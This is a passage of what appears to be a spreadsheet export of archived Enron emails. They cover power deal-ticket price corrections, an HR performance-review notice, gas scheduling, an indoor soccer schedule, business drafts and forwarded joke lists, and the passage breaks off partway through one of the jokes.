To: Chris H Foster/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)_x000D_
_x000D_
Chris,_x000D_
Good morning!  Hey, one thing I probably did not clarify to you yesterday on _x000D_
was that when the new deal ticket was set up for the $140 price strip (Deal _x000D_
#576468.1), the deal should only be in for (4/6/2001) according to APX's _x000D_
statement (not including 4/7/2001).  Therefore, the entire offpeak for your _x000D_
deal would be booked on Deal #572069.1 for the $150 price for 4/7/2001.  Let _x000D_
me know if you have any questions.  Thanks._x000D_
ajc_x000D_
_x000D_
---------------------- Forwarded by Audrey Cook/HOU/ECT on 04/10/2001 09:44 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
04/06/2001 01:27 PM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: APX - 4/6/2001_x000D_
_x000D_
Chris,_x000D_
One more quick thing on 4/6/2001- APX is showing 2 different prices for _x000D_
offpeak ($140 &amp; $150 - different MW per strip).  EPMI is showing $150 @ 12/MW _x000D_
per offpeak hours.  This difference amounts to a $144 difference (APX has _x000D_
lower invoice).  Can you verify?  Everything else is fine....talk to you next _x000D_
week.  Have a good weekend.  _x000D_
ajc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Nov 1999 06:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Associate/Analyst/Merchant Services Analyst Performance Review_x000D_
 Committee (PRC) Meeting !!!</t>
  </si>
  <si>
    <t xml:space="preserve">SK - I put this on your calendar in case you will be attending on Stacey's=_x000D_
=20_x000D_
behalf.  mm_x000D_
_x000D_
Steve:_x000D_
_x000D_
Per the notice below, the performance review meeting for the AA program is=_x000D_
=20_x000D_
December 13 (the time is not listed).  In addition to listing my supervisor=_x000D_
,=20_x000D_
I am supposed to provide HR with the person in our business unit who is doi=_x000D_
ng=20_x000D_
the pre-ranking information for the PRC.  I assume you are doing the=20_x000D_
pre-ranking.  I need to submit this information by 5:00 p.m. tomorrow. =20_x000D_
Please let me know if you will be able to attend the December 13th meeting =_x000D_
on=20_x000D_
my behalf, and if you or someone else is doing the pre-ranking._x000D_
_x000D_
Many thanks,_x000D_
Stacey =20_x000D_
---------------------- Forwarded by Stacey Bolton/HOU/EES on 11/15/99 01:46=_x000D_
=20_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Naomi Johnston@ECT_x000D_
11/15/99 01:20 PM_x000D_
To: Kara Knop/Enron Communications@Enron Communications, Karissa=20_x000D_
Johnson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Karla Compean/HOU/ECT@ECT, Kat=_x000D_
e=20_x000D_
Lucas/HOU/ECT@ECT, Katie Stowers/HOU/ECT@ECT, Keba Gordon/HOU/AZURIX@AZURIX=_x000D_
,=20_x000D_
Kelly McCoy/HOU/ECT@ECT, Ken Tate/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=20_x000D_
Kenneth Chow/HOU/ECT@ECT, Kenneth Shulklapper/HOU/ECT@ECT, Kent=20_x000D_
McNellie/HOU/ECT@ECT, Kenza Bennouna/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Kevin Greiner/HOU/EES@EES, Kevin Ruscitti/HOU/ECT@ECT, Kevin=20_x000D_
Zheng/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Key Kasravi/HOU/ECT@ECT, Kim=20_x000D_
Womack/Enron Communications@Enron Communications, Kirk=20_x000D_
Neuner/Contractor/Enron Communications@Enron Communications, Kristen=20_x000D_
Hand/HOU/EES@EES, Kristina Lund/HOU/ECT@ECT, Kyle Francis/HOU/EES@EES, Kyle=_x000D_
=20_x000D_
Kettler/HOU/ECT@ECT, LaRence Snowden/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Larry F Campbell/HOU/EES@EES, Laura=20_x000D_
Howenstine/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Laura Wente/HOU/ECT@ECT,=20_x000D_
Leandro Ibasco/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lee Jackson/HOU/ECT@ECT=_x000D_
,=20_x000D_
Leon Branom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Leonard Tham/HOU/ECT@ECT,=_x000D_
=20_x000D_
Leonardo Pacheco/HOU/EES@EES, Leroy L Ho/ENRON_DEVELOPMENT@ENRON_DEVELOPMEN=_x000D_
T,=20_x000D_
Lewis Worthy/HOU/ECT@ECT, Li Xiao/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lind=_x000D_
a=20_x000D_
M Chenoweth/HOU/ECT@ECT, Lino Mastrangelo/HOU/EES@EES, Liqun=20_x000D_
Pan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lisa C Rosenberg/HOU/ECT@ECT, Livi=_x000D_
a=20_x000D_
Benavides/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lori Hope/HOU/ECT@ect, Luis=_x000D_
=20_x000D_
Mena/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Luis=20_x000D_
Mendez/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lynette Malone/HOU/ECT@ECT,=20_x000D_
Maggie Li/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mallik Avs/HOU/EES@EES, Marc=_x000D_
=20_x000D_
Eichmann/Corp/Enron@ENRON, Marc Poulson/HOU/ECT@ECT, Marc=20_x000D_
Sabine/NA/Enron@ENRON, Marcus Edmonds/HOU/EES@EES, Margaret=20_x000D_
Allen/Corp/Enron@ENRON, Margaret Rhee/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Margarita Vicens/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mari=20_x000D_
Capestany/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mario=20_x000D_
Alonso/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marissa C Womble/HOU/ECT@ECT,=_x000D_
=20_x000D_
Mark Castiglione/HOU/EES@EES, Mark Dypiangco/HOU/EES@EES, Mark=20_x000D_
Gandy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark Reese/HOU/EES@EES, Markus=_x000D_
=20_x000D_
Urban/PDX/ECT@ECT, Marsha Francis/HOU/EES@EES, Martin=20_x000D_
Gonzalez/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Martin Lin/HOU/ECT@ECT, Marti=_x000D_
n=20_x000D_
Sacchi/Corp/Enron@Enron, Martin Sonesson/ENRON_DEVELOPMENT@ENRON_DEVELOPMEN=_x000D_
T,=20_x000D_
Mary J John/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mary Jane=20_x000D_
Glasscock/HOU/AZURIX@AZURIX, Mateo Vegalara/HOU/ECT@ECT, Mathew=20_x000D_
Gimble/HOU/ECT@ECT, Matthew Duffy/NA/Enron@Enron, Matthew=20_x000D_
Jachimiak/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT, Meera=20_x000D_
Natarajan/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Melaine=20_x000D_
Fernandes/Corp/Enron@ENRON, Micha Makowsky/HOU/ECT@ECT, Michael=20_x000D_
Flanigan/HOU/EES@EES, Michael Garberding/HOU/ECT@ECT, Michael=20_x000D_
Harris/Associate/HOU/EES@EES, Michael M Driscoll/PDX/ECT@ECT, Michael=20_x000D_
Ratner/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Michael Sergeev/HOU/ECT@ECT,=20_x000D_
Michael Simmons/HOU/ECT@ECT, Michael Stockton/HOU/ECT@ECT, Michele Nezi=20_x000D_
Marvin/Enron Communications@Enron Communications, Michelle=20_x000D_
Wenz/HOU/AZURIX@AZURIX, Miguel Vasquez/HOU/ECT@ECT, Mike Shannon/Enron=20_x000D_
Communications@Enron Communications, Milind Pasad/HOU/ECT@ECT, Milson=20_x000D_
Filho/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mingcheng=20_x000D_
Lian/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Missy Stevens/Corp/Enron@ENRON, M=_x000D_
o=20_x000D_
Bawa/HOU/ECT@ECT, Molly Hellerman/HOU/AZURIX@AZURIX, Mona Parikh/HOU/EES@EE=_x000D_
S,=20_x000D_
Monica Edwards/HOU/ECT@ECT, Monica Rodriguez/HOU/ECT@ECT, Na=20_x000D_
Zhu/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nadege=20_x000D_
Volcy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Najah Ade/Corp/Enron@Enron,=20_x000D_
Natasha Danilochkina/LON/ECT@ECT, Nathan=20_x000D_
Will/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ned Higgins/HOU/ECT@ECT, Neerav=_x000D_
=20_x000D_
Nanavaty/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nehal Vakil/HOU/EES@EES, Neil=_x000D_
=20_x000D_
Sainsbury-Carter/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nelson=20_x000D_
Wu/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nicholas J Stephan/HOU/ECT@ECT,=20_x000D_
Nicole Alvino/HOU/ECT@ECT, Nicole La/HOU/ECT@ECT, Nicole=20_x000D_
Palczer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nikhil=20_x000D_
Shah/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nisha Desai/HOU/AZURIX@AZURIX,=20_x000D_
Palmer Letzerich/Enron Communications@Enron Communications, Partho=20_x000D_
Ghosh/HOU/ECT@ECT, Patricia Slaughter/HOU/ECT@ECT, Patricia=20_x000D_
Tlapek/HOU/ECT@ECT, Patrick Leahy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=20_x000D_
Patrick Markey/HOU/ECT@ECT, Patrick Meyers/HOU/AZURIX@AZURIX, Patrick=20_x000D_
Tucker/HOU/ECT@ECT, Paul Burkhart/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Paul=_x000D_
=20_x000D_
Gregory/HOU/ECT@ECT, Paul J Broderick/HOU/ECT@ECT, Paulo Issler/HOU/ECT@ECT=_x000D_
,=20_x000D_
Pedro Blanco/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Peter=20_x000D_
Hayes/HOU/AZURIX@AZURIX, Peter=20_x000D_
Heintzelman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Portia Kersten/HOU/ECT@ECT=_x000D_
,=20_x000D_
Priya Jaisinghani/HOU/EES@EES, Purvi Patel/HOU/ECT@ECT, Raimund=20_x000D_
Grube/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rajesh Chettiar/HOU/ECT@ECT,=20_x000D_
Raphael Brun/LON/ECT@ECT, Raymond Hart/HOU/AZURIX@AZURIX, Rebecca=20_x000D_
Phillips/HOU/ECT@ECT, Rene Bisono/HOU/EES@EES, Reuben Maltby/LON/ECT@ECT,=_x000D_
=20_x000D_
Reza Rezaeian/Corp/Enron@ENRON, Richard A Lassander/HOU/AZURIX@AZURIX,=20_x000D_
Richard Hsu/HOU/ECT@ECT, Richard Schneider/HOU/AZURIX@AZURIX, Rob=20_x000D_
Black/HOU/EES@EES, Robert Fuller/HOU/ECT@ECT, Robert Hitch/HOU/ECT@ect,=20_x000D_
Roberto Martinez/HOU/ECT@ECT, Robyn Roberts/HOU/ECT@ECT, Rock=20_x000D_
Mwongozi/ET&amp;S/Enron@Enron, Roger Persson/HOU/ECT@ECT, Roman=20_x000D_
Zadorozhny/HOU/ECT@ECT, Ross Mesquita/HOU/EES@EES, Ross Prevatt/HOU/ECT@ECT=_x000D_
,=20_x000D_
Rousseau Anai/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Russell T=20_x000D_
Kelley/HOU/ECT@ECT, Ryan Deane/HOU/ECT@ECT, Ryan Synnott/HOU/ECT@ECT, Saeed=_x000D_
=20_x000D_
Raja/HOU/ECT@ECT, Samantha Bryce/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Samar=_x000D_
=20_x000D_
Khleif/HOU/ECT@ECT, Sameer Vasudev/Corp/Enron@Enron, Sarah A=20_x000D_
Davis/HOU/ECT@ECT, Sarah Goodpastor/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=20_x000D_
Sarah Mulholland/HOU/ECT@ECT, Sarah-Joy Hunter/HOU/EES@EES, Scott W=20_x000D_
Beilharz/HOU/EES@EES, Sean Black/HOU/ECT@ECT, Sean Keenan/HOU/ECT@ECT, Sele=_x000D_
na=20_x000D_
Reyes/HOU/ECT@ECT, Seth Hurwitz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Shanna=_x000D_
=20_x000D_
Husser/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sharad=20_x000D_
Malhotra/HOU/AZURIX@AZURIX, Sheetal Bajoria/HOU/AZURIX@AZURIX, Shelia=20_x000D_
Benke/HOU/EES@EES, Shelly Friesenhahn/Corp/Enron@ENRON, Silvia=20_x000D_
Veitia/HOU/AZURIX@AZURIX, Song Wei/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=20_x000D_
Stacey Bolton/HOU/EES@EES, Stanton Ray/HOU/ECT@ECT, Steinunn=20_x000D_
Thordardottir/HOU/AZURIX@AZURIX, Stephanie Segura/HOU/ECT@ECT, Stephen=20_x000D_
Gray/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stephen=20_x000D_
Stenhouse/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stephen Swain/HOU/ECT@ECT,=_x000D_
=20_x000D_
Stephen Thome/HOU/ECT@ECT, Steve Hirsh/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Steven Kleege/HOU/ECT@ECT, Steven Leung/HOU/EES@EES, Steven Vu/HOU/ECT@ECT,=_x000D_
=20_x000D_
Stewart Peter/LON/ECT@ECT, Stuart Schardin/HOU/ECT@ECT, Suresh=20_x000D_
Vasan/HOU/ECT@ECT, Susan Edison/LON/AZURIX@AZURIX, Susan R Lewis/HOU/ECT@EC=_x000D_
T,=20_x000D_
Suzanne Farrow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Suzanne=20_x000D_
Vann/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sven Becker/FRA/ECT@ECT, Ted=20_x000D_
Huang/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ted Noble/HOU/ECT@ECT, Terri=20_x000D_
Denning/HOU/AZURIX@AZURIX, Terry W Donovan/HOU/ECT@ECT, Thomas=20_x000D_
Bremond/LON/ECT@ECT, Thomas Georgis/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=20_x000D_
Thomas Pullen/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Tiffany Mayo/HOU/ECT@ECT=_x000D_
,=20_x000D_
Tiffany Wright/HOU/ECT@ECT, TJ Rylander/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT=_x000D_
,=20_x000D_
Todd B Hattenbach/DEN/ECT@Enron, Todd Neugebauer/HOU/ECT@ECT, Todd Van=20_x000D_
Roten/HOU/ECT@ECT, Tom Chapman/HOU/ECT@ECT, Tom Dutta/HOU/ECT@ECT, Tom=20_x000D_
Huntington/Enron Communications@Enron Communications, Tom Prisk/HOU/EES@EES=_x000D_
,=20_x000D_
Tony Brown/HOU/ECT@ECT, Tracee Bersani/HOU/ECT@ECT, Travis=20_x000D_
Andrews/HOU/EES@EES, Trevor Randolph/Corp/Enron@ENRON, Trevor=20_x000D_
Woods/HOU/ECT@ECT, Tyrell Harrison/HOU/ECT@ECT, Valter=20_x000D_
Stoiani/Corp/Enron@ENRON, Vicky Ha/HOU/ECT@ECT, Victor Browner/SF/ECT@ECT,=_x000D_
=20_x000D_
Vikram Kulkarni/HOU/EES@EES, Virawan Yawapongsiri/HOU/EES@EES, Vishal=20_x000D_
Apte/HOU/ECT@ECT, Vito Iaia/HOU/ECT@ECT, Ward=20_x000D_
Cerny/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Webb Jennings/HOU/ECT@ECT, Will=_x000D_
=20_x000D_
Chen/HOU/ECT@ECT, Will Nolen/Enron Communications@Enron Communications, Bil=_x000D_
l=20_x000D_
Heidecker/HOU/EES@EES, William Keeney/HOU/ECT@ECT, Wilson=20_x000D_
Kriegel/Corp/Enron@ENRON, Winston Cheng/SF/ECT@ECT, Xi=20_x000D_
Xi/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Yelena=20_x000D_
Lungin/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Yevgeny Frolov/HOU/AZURIX@AZURI=_x000D_
X,=20_x000D_
Yvan Chaxel/HOU/EES@EES, Zac McCarroll/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Zaib Iqtidar/HOU/ECT@ECT, Zal Masani/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Associate/Analyst/Merchant Services Analyst Performance Review=20_x000D_
Committee (PRC) Meeting !!!_x000D_
_x000D_
Don=01,t Miss Out on Your Opportunity To Be Represented at the Year-End=20_x000D_
Associate/Analyst/Merchant Services Analyst Performance Review Committee=20_x000D_
(PRC) Meeting December 13, 1999_x000D_
_x000D_
The Enron Corporate Staff Human Resources Department will be holding a=20_x000D_
year-end PRC meeting December 13th for all members of the Associate/Analyst=_x000D_
=20_x000D_
and Merchant Services Analyst Programs. In order to be represented at this=_x000D_
=20_x000D_
meeting, each program participant must fulfill the following requirements:_x000D_
_x000D_
1. You must ensure that your supervisor attends your scheduled business uni=_x000D_
t=20_x000D_
PRC or performance review in order to obtain a   pre-ranking for you. (Plea=_x000D_
se=20_x000D_
forward this e-mail to your supervisor)._x000D_
_x000D_
2. You must inquire as to who in your business unit will be able to attend =_x000D_
to=20_x000D_
represent and provide pre-ranking information for the Year-End PRC meeting=_x000D_
=20_x000D_
scheduled for December 13, 1999._x000D_
_x000D_
3. You must provide the Human Resources Department with the following=20_x000D_
information regarding your rotation by Tuesday,   November 16th:_x000D_
_x000D_
 Company Name_x000D_
Department Name_x000D_
Supervisor (as of 10/01/1999)=20_x000D_
Year-End PRC Representative_x000D_
_x000D_
Please forward this information to Naomi Johnston (njohnst@enron.com) by 5:=_x000D_
00=20_x000D_
p.m., Tuesday, November 16.  If you have any questions regarding the proces=_x000D_
s=20_x000D_
please call Todd Peikert at (713) 853-5243._x000D_
_x000D_
Thank You for taking the time to ensure that all Associate/Analyst and=20_x000D_
Merchant Services Analyst Program participants are properly represented at=_x000D_
=20_x000D_
the Year-End PRC Meeting._x000D_
_x000D_
Enron Corporate Staff Human Resources_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 07:00:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kelly.loocke@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'joann.collins@enron.com', 'kevin.alvarado@enron.com', 'kelly.loocke@enron.com', 'steve.gillespie@enron.com', 'john.hodge@enron.com', 'victor.lamadrid@enron.com'})</t>
  </si>
  <si>
    <t>TCO MDIQ for 9/27/01</t>
  </si>
  <si>
    <t>There will be no over injections for 9/27/01._x000D_
_x000D_
Kelly M. Loocke_x000D_
Enron North America_x000D_
713-853-3570_x000D_
pager:  877-872-7966</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 14:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Coming to eThink October 27: ThinkBank Resources</t>
  </si>
  <si>
    <t>Overdraft protection.  What does that really mean?  If you're talking about a _x000D_
checking account, it means you won't pay a penalty for insufficient funds.  _x000D_
What about intellectual overdraft protection?  The penalty is much greater if _x000D_
you have insufficient funds in your mental bank account._x000D_
_x000D_
Making frequent visits to Resources in the ThinkBank is solid protection _x000D_
against intellectual overdraft.  In Resources, the ThinkBank tellers have put _x000D_
together a list of books and software -- sort of a knowledge "nest egg" for _x000D_
you to build on._x000D_
_x000D_
Resources.  We've got your intellectual capital covered.</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 17:33:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jon.gail@hcs.state.or.us'})</t>
  </si>
  <si>
    <t>Indoor Soccer for FC TBA</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys (aka FC TBA),_x000D_
_x000D_
I thought you might like a copy of the Portland Indoor Schedule.  Here are_x000D_
the remaining 7 games including tonight's game._x000D_
_x000D_
MON JUN 11   9:15 PM    THUNDER!         vs    FC TBA_x000D_
WED JUN 20  10:15 PM    EINTRACHT ROACH  vs    FC TBA_x000D_
MON JUN 25   6:15 PM    ROWDIES          vs    FC TBA_x000D_
THU JUL  5   8:15 PM    FC TBA           vs    IMPALAS_x000D_
THU JUL 12   9:15 PM    FC TBA           vs    CARVE...._x000D_
MON JUL 16   8:15 PM    FC TBA           vs    STICK BUILT_x000D_
WED JUL 25   7:15 PM    BALLERSS         vs    FC TBA_x000D_
_x000D_
THU AUG  2   9:15 PM    #1 vs #2 CHAMPIONSHIP GAME_x000D_
_x000D_
Here is a link to the Portland Indoor in case you loose your schedule or_x000D_
want to know the standings:_x000D_
_x000D_
http://pdxindoorsoccer.com/index2.htm_x000D_
_x000D_
_x000D_
Jon </t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 14:39:45 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: EPNG Proposal II</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks G_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nemec, Gerald  _x000D_
Sent:	Monday, October 29, 2001 4:37 PM_x000D_
To:	Fuller, Dave; Whitt, Mark_x000D_
Cc:	Miller, Stephanie; Tycholiz, Barry_x000D_
Subject:	RE: EPNG Proposal II_x000D_
_x000D_
Attached is the document with one change. _x000D_
_x000D_
 &lt;&lt; File: EPNG Capacity Proposal II1.doc &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fuller, Dave  _x000D_
Sent:	Monday, October 29, 2001 2:56 PM_x000D_
To:	Whitt, Mark_x000D_
Cc:	Nemec, Gerald; Miller, Stephanie; Tycholiz, Barry_x000D_
Subject:	EPNG Proposal II_x000D_
_x000D_
All,_x000D_
_x000D_
Here is a draft document for BP, please review and comment._x000D_
_x000D_
Dave_x000D_
_x000D_
 &lt;&lt; File: EPNG Capacity Proposal II.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 12 May 2000 03:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.tawney@enron.com', 'tanya.rohauer@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Palladium Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find the last version of the Letter to Palladium which will _x000D_
go out this afternoon by courier, along with the relevant exhibits. Should _x000D_
anyone have any final comments to this, please let me know ASAP._x000D_
_x000D_
Many thanks, _x000D_
_x000D_
Shari  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 12:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hallmark cards you'll NEVER see!</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Hallmark cards you'll NEVER see!_x000D_
&gt;_x000D_
&gt;  *"Congratulations on your wedding day!  Too bad no one likes your wife."_x000D_
&gt;  *"How could two people as beautiful as you have such an ugly baby?"_x000D_
&gt;  *"I've always wanted to have someone to hold, someone to love._x000D_
&gt;  After having met you, I've changed my mind."_x000D_
&gt;  *"I must admit, you brought Religion in my life.  I never believed in_x000D_
Hell_x000D_
&gt;  until I met you."_x000D_
&gt;  *"Looking back over the years that we've been together, I can't help but_x000D_
&gt;  wonder: What the fuck was I thinking?"_x000D_
&gt;  *"As the days go by, I think of how lucky I am that you're not here to_x000D_
ruin_x000D_
&gt;  it for me."_x000D_
&gt;  *"If I get only one thing for Christmas, I hope it's your sister."_x000D_
&gt;  *"As you grow older, Mom, I think of all the gifts you've given me._x000D_
&gt;  Like the need for therapy!!"_x000D_
&gt;  *"Thanks for being a part of my life!  I never knew what evil was before_x000D_
&gt;  this!"_x000D_
&gt;  *"Congratulations on your promotion.  Before you go, would like to take_x000D_
this_x000D_
&gt;  knife out of my back?  You'll probably need it again."_x000D_
&gt;  *"Someday I hope to get married, but not to you."_x000D_
&gt;  *"Happy Birthday!  You look great for your age...almost life-like!_x000D_
&gt;  *"When we were together, you always said you'd die for me._x000D_
&gt;  Now that we've broken up, I think it's time you kept your promise."_x000D_
&gt;  *"We have been friends for a very long time -- what do you say we call it_x000D_
&gt;  quits?"_x000D_
&gt;  *"I'm so miserable without you, it's almost like you're here."_x000D_
&gt;  *"Congratulations on your new bundle of joy._x000D_
&gt;  Did you ever find out who the father was?"_x000D_
&gt;  *"You are such a good friend that if we were on a sinking ship and there_x000D_
was_x000D_
&gt;  only one life jacket, I'd miss you heaps and think of you often."_x000D_
&gt;  *"Your friends and I wanted to do something special for your birthday so_x000D_
&gt;  we're having you put to sleep."_x000D_
&gt;  *"Happy Birthday, Uncle Dad!!" (available only in Arkansas, West_x000D_
&gt;  VA,Tennessee, Alabama, Georgia-Oh Hell, lets just say all states south of_x000D_
&gt;  Maryland) &gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 05:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jdquillen@yahoo.com'})</t>
  </si>
  <si>
    <t>frozenset({'yasu_neupdx@hotmail.com', 'jons@gfsloans.com', 'mark.guzman@enron.com', 'dacklin@genuity.com', 'jzinn@proaxis.com'})</t>
  </si>
  <si>
    <t>Fwd: Top5 - 4/17/01 - Signs a Rapper Has Gone Nuts</t>
  </si>
  <si>
    <t xml:space="preserve">Note: forwarded message attached._x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Auctions - buy the things you want at great prices_x000D_
http://auctions.yahoo.com/_x000D_
Content-transfer-encoding: 7BIT_x000D_
Received: by mail2.aracnet.com (mbox dquillen) (with Cubic Circle's cucipop _x000D_
(v1.31 1998/05/13) Tue Apr 17 12:28:25 2001)_x000D_
X-From_: list-errors.2000000260.0.2000191297.002@boing.topica.com  Tue Apr 17 _x000D_
00:45:15 2001_x000D_
Return-Path: &lt;list-errors.2000000260.0.2000191297.002@boing.topica.com&gt;_x000D_
Received: from outmta022.topica.com (outmta022.topica.com [206.132.75.240]) _x000D_
by mail3.aracnet.com (8.11.0/8.11.0) with SMTP id f3H7jFC01900 for _x000D_
&lt;dquillen@aracnet.com&gt;; Tue, 17 Apr 2001 00:45:15 -0700_x000D_
To: Top5@topica.com_x000D_
From: The Top 5 List &lt;Top5List@topfive.com&gt;_x000D_
Subject: Top5 - 4/17/01 - Signs a Rapper Has Gone Nuts_x000D_
Message-ID: &lt;0.2000000260.39144736-915719520-987493442@topica.com&gt;_x000D_
Reply-To: Top5List@topfive.com_x000D_
X-Topica-Loop: 2000000260_x000D_
List-Help: &lt;http://topica.com/lists/Top5/&gt;_x000D_
List-Unsubscribe: &lt;mailto:Top5-unsubscribe@topica.com&gt;_x000D_
List-Subscribe: &lt;mailto:Top5-subscribe@topica.com&gt;_x000D_
List-Archive: &lt;http://topica.com/lists/Top5/read&gt;_x000D_
Received: (qmail 2906 invoked by alias); 17 Apr 2001 07:43:10 -0000_x000D_
Received: (qmail 2901 invoked by uid 0); 17 Apr 2001 07:43:10 -0000_x000D_
Received: from lsmls01.we.mediaone.net (24.130.1.20)  by inmta002.topica.com _x000D_
with SMTP; 17 Apr 2001 07:43:10 -0000_x000D_
Received: from custerdome (we-66-74-8-175.we.mediaone.net [66.74.8.175]) by _x000D_
lsmls01.we.mediaone.net (8.11.1/8.11.1) with ESMTP id f3H7h9C18904 for _x000D_
&lt;Top5-*****@topica.com&gt;; Tue, 17 Apr 2001 00:43:10 -0700 (PDT)_x000D_
Date: Tue, 17 Apr 2001 00:45:42 -0700_x000D_
MIME-Version: 1.0_x000D_
Content-type: text/plain; charset="us-ascii"_x000D_
X-mailer: Pegasus Mail for Win32 (v3.12c)_x000D_
Content-Length: 6315_x000D_
_x000D_
==================================================================_x000D_
         T  H  E     T  O  P     F  I  V  E     L  I  S  T_x000D_
                      Rest In Peace, Joey R._x000D_
==================================================================_x000D_
_x000D_
  Today's Classic Top5:  Songs if the Artists Re-Made Them Today_x000D_
         Read it on our website:  http://www.topfive.com_x000D_
         To subscribe:  Top5Classic-subscribe@topica.com_x000D_
_x000D_
_x000D_
                          April 17, 2001_x000D_
_x000D_
                         NOTE FROM CHRIS:_x000D_
_x000D_
         Rapper Sean Combs recently announced that he no_x000D_
       longer wants to be known as "Puffy" or "Puff Daddy,"_x000D_
           preferring instead to be called "P. Diddy."_x000D_
_x000D_
_x000D_
             The Top 12 Signs a Rapper Has Gone Nuts_x000D_
_x000D_
_x000D_
12&gt; Stopped wearing a sideways baseball cap, and started wearing_x000D_
    a tin-foil Napoleon hat._x000D_
_x000D_
11&gt; Asks the press and to call him "G. Dubya."_x000D_
_x000D_
10&gt; Shows up at his next concert wearing a Catholic schoolgirl_x000D_
    dress and raps about the cruelty of living under "Da Momma_x000D_
    Supe."_x000D_
_x000D_
 9&gt; "All work 'n' no play makez Ice Tray a dull bo-weee._x000D_
     All work 'n' no play makez Ice Tray a dull bo-weee._x000D_
